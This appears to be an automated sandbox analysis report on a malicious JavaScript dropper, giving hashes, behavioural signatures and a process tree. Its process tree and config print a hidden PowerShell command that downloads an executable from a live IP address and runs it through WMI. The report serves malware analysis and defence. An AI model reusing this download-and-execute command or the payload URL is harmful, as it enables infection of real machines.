Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
22-05-2024 23:13
Static task
static1
Behavioral task
behavioral1
Sample
68f65871f36e2d1053fdc94c325c666e_JaffaCakes118.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
68f65871f36e2d1053fdc94c325c666e_JaffaCakes118.js
Resource
win10v2004-20240508-en
General
-
Target
68f65871f36e2d1053fdc94c325c666e_JaffaCakes118.js
-
Size
31KB
-
MD5
68f65871f36e2d1053fdc94c325c666e
-
SHA1
b8e4fcdd25cac949cfb8e5af10c20f0d9a819bc2
-
SHA256
8adf64000dda34334dd18581022e68206b9b4f2871700f9e8b0176f9dfc2cecb
-
SHA512
df9b28fbe881970bd5746360c4e77ec85f317899891aacc5adda6126beee91fe0117d1d9d21a0621393f361843f755f8199737566dee5b2ea22d3e9b160b63d2
-
SSDEEP
768:+e2mLWvpMQH8b/KN13u/HPPBD2IWNpHOjyefFYRtiQE0rFwT3uBLeXEJ:+e2TBMQH8omqBF
Malware Config
Extracted
http://185.198.57.172/faazdfdsxm.exe?XVMtv
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 2968 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2968 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2968 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
wscript.execmd.exedescription pid process target process PID 2032 wrote to memory of 3052 2032 wscript.exe cmd.exe PID 2032 wrote to memory of 3052 2032 wscript.exe cmd.exe PID 2032 wrote to memory of 3052 2032 wscript.exe cmd.exe PID 3052 wrote to memory of 2968 3052 cmd.exe powershell.exe PID 3052 wrote to memory of 2968 3052 cmd.exe powershell.exe PID 3052 wrote to memory of 2968 3052 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\68f65871f36e2d1053fdc94c325c666e_JaffaCakes118.js1⤵
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell.exe -w hidden -noprofile -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://185.198.57.172/faazdfdsxm.exe?XVMtv','%tEmp%xiL95.ExE'); Invoke-WmiMetHoD -CLass WIN32_ProcESS -NaME CReatE -ArguMeNtLISt '%TeMP%xiL95.EXE'2⤵
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -w hidden -noprofile -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://185.198.57.172/faazdfdsxm.exe?XVMtv','C:\Users\Admin\AppData\Local\TempxiL95.ExE'); Invoke-WmiMetHoD -CLass WIN32_ProcESS -NaME CReatE -ArguMeNtLISt 'C:\Users\Admin\AppData\Local\TempxiL95.EXE'3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2968